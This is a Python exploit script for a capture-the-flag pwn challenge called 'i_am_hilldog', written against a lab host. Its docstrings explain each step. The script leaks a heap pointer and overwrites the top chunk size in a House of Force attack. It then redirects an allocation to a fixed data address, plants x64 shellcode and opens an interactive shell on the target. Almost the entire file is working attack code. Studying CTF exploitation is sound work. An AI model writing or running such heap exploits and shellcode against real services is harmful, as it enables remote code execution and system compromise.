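"""Exploit driver for the ``i_am_hilldog`` pwn challenge.

Talks to the target's line-based menu over a raw socket using the ``phun``
helper library (``phun.Remote`` for socket I/O, ``phun.p64``/``phun.u64`` for
64-bit packing, ``phun.sh('x64')`` for a shellcode stub, ``Remote.shell()`` for
the interactive session at the end).  The flow, as reconstructed from the
original script, is:

1. leak a heap pointer via menu items 6/7: a 0xc7-byte filler ending in ``|``
   is stored and printed back, and whatever follows the ``|`` on that line is
   treated as a little-endian pointer;
2. put shellcode into the first mail buffer and overwrite the word the
   original calls ``top`` (104 bytes past the buffer) with
   0xffffffffffffffff, which looks like the House of Force technique against
   the heap's top chunk;
3. request a huge mail so the following allocation lands on ``TARGET_PTR``,
   then store a pointer to the shellcode buffer there;
4. fire it with the exit menu item and hand the socket to the user.

Only use this against a target you are authorised to attack.  The default
target is the lab address from the original script; it also listed
``localhost:1234`` and ``iamhilldog.pwn.democrat:9000``.  Override with
``python exploit.py [host] [port]``.

NOTE(review): the original file had lost all indentation, so statement
nesting (notably inside ``R.__email`` and the "no heap" branch) was
reconstructed from context - verify against a live session.
"""
import sys

import phun

DEFAULT_HOST = '192.168.200.173'
DEFAULT_PORT = 1234

# Fixed address in the binary's writable data (so presumably a non-PIE
# build) that ends up holding a pointer to our buffer.  What lives there and
# how ``die()`` dereferences it is not visible in this script.
TARGET_PTR = 0x603110

# malloc(100) hands back 104 usable bytes; the word right after them is what
# the original calls the top (chunk size field).
MAIL_SIZE = 100
MAIL_USABLE = 104


class R(phun.Remote):
    """Thin wrapper around the target's menu protocol.

    Every interaction follows the same pattern: wait for a known prompt,
    send one line.  The menu numbers (1, 2, 3, 4, 6, 7, 8) are taken from the
    original script; their exact labels in the binary are not known here.
    """

    def cmd(self, x):
        """Wait for the menu prompt (a line ending in ``?``) and send choice x."""
        self.read('?\n')
        self.write(str(x) + '\n')

    def die(self):
        """Menu item 8: exit the target; this is also what fires the payload."""
        self.cmd(8)

    def __email(self, n, a, b='aaaa\n'):
        """Drive menu item n (1: new mail, 2: fill mail) through its prompts.

        b is sent at the ``> `` prompt and a after the prompt that follows.
        When the target answers b with an immediate newline, one extra blank
        line is consumed first; the original's intent for that branch is not
        documented, it is mirrored as-is.
        """
        self.cmd(n)
        self.read('> ')
        self.write(b)
        if self.read(1) == "\n":
            # NOTE(review): only this read was taken as the if-body when
            # reconstructing the lost indentation - confirm on a live run.
            self.read('\n\n')
        self.read('\n')
        self.write(a)
        self.read('\n')

    def new_mail(self, data):
        """Menu item 1: create a mail whose size field is data (sent as a line)."""
        self.__email(1, str(data) + "\n")

    def fill_mail(self, data):
        """Menu item 2: write raw data into the most recent mail buffer."""
        self.__email(2, data)

    def add_mail(self, data, s=None):
        """Create a mail of size s (default len(data)), fill it, then send item 3.

        s=0 falls back to len(data), as in the original (``s or len(data)``).
        """
        s = s or len(data)
        self.new_mail(s)
        self.fill_mail(data)
        self.cmd(3)

    def edit(self, idx, data):
        """Menu item 4: rewrite mail idx with data.

        The ``?: `` prompt is answered with ``n`` before the payload is sent;
        what that question asks is not visible here.
        """
        self.cmd(4)
        self.read('?\n')
        self.write(str(idx) + "\n")
        self.read('?: ')
        self.write('n\n')
        self.write(data)
        self.read('\n\n')


def _parse_target(argv):
    """Return (host, port) from argv, falling back to the lab defaults.

    Raises ValueError if the port argument is not an integer.
    """
    host = argv[1] if len(argv) > 1 else DEFAULT_HOST
    port = int(argv[2]) if len(argv) > 2 else DEFAULT_PORT
    return host, port


def leak_heap(r):
    """Leak a heap pointer through menu items 6 and 7.

    Stores 0xc7 filler bytes ending in ``|`` and reads the line the target
    prints back; the bytes after the ``|`` are unpacked as a 64-bit pointer.
    Returns 0 when no ``|`` comes back, so the caller treats a missing
    separator the same as a zero leak instead of crashing on an IndexError.
    """
    r.cmd(6)
    r.read(": ")
    r.write('a' * 0xc7 + '|')
    r.cmd(7)
    line = r.read("\n")
    _, sep, tail = line[:-1].partition('|')   # drop the trailing newline first
    if not sep:
        return 0
    # A leaked pointer is often shorter than 8 bytes (its high bytes are
    # zero); pad with NULs so unpacking sees a full word.  Harmless if
    # phun.u64 already does this.
    return phun.u64(tail[:8].ljust(8, '\x00'))


def main(argv=None):
    """Run the exploit against the configured target and drop into a shell."""
    host, port = _parse_target(sys.argv if argv is None else argv)
    r = R(host, port)

    # The service apparently presents a '$' prompt first; the original
    # launches the challenge binary from it by name.
    r.read('$')
    r.write('./i_am_hilldog.exe\n')

    heap = leak_heap(r)
    if not heap:
        print('[-] no heap')
        r.die()
        sys.exit(1)

    mybuf = heap + 0x20             # first mail buffer, 0x20 past the leak
    top = mybuf + MAIL_USABLE       # word the original treats as the top size
    print('[+] heap: %s' % hex(heap))
    print('[+] top: %s' % hex(top))

    r.add_mail('dupa\n', s=MAIL_SIZE)

    # Layout written over mail 0: [ptr -> mybuf+8][shellcode, int3-padded]
    # [0xffffffffffffffff].  The last word lands exactly on ``top``.
    sh = phun.sh('x64').ljust(MAIL_USABLE - 8, "\xcc")
    r.edit(0, phun.p64(mybuf + 8) + sh + '\xff' * 8 + "\n")

    # Request a size that moves the top past TARGET_PTR minus two header
    # words, so the next normal allocation starts at TARGET_PTR.
    r.new_mail(TARGET_PTR - top - 2 * 8)
    r.new_mail(MAIL_SIZE)
    r.fill_mail(phun.p64(mybuf) + "\n")

    r.die()
    r.read("\n")
    print('[+] have some shellz')
    r.shell()


if __name__ == '__main__':
    main()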